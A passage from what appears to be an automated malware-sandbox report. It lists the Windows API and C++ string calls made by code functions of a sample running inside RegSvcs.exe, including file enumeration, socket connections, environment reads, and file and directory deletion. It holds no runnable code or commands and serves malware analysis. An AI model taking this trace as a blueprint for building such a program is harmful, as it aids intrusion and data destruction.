BV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@6_2_013C0586
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B4C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,D3DKMTWaitForSynchronizationObjectFromGpu,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,6_2_013B4C0A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B3325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,6_2_013B3325
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE6_2_013B477E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013C2BEE Sleep,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,6_2_013C2BEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,6_2_013B728F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B04C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,D3DKMTWaitForSynchronizationObjectFromGpu,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00B04C0A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B10586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,D3DKMTWaitForSynchronizationObjectFromGpu,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator12_2_00B10586
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B0751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00B0751B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B0728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00B0728F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B12BEE Sleep,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_00B12BEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B03325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00B03325
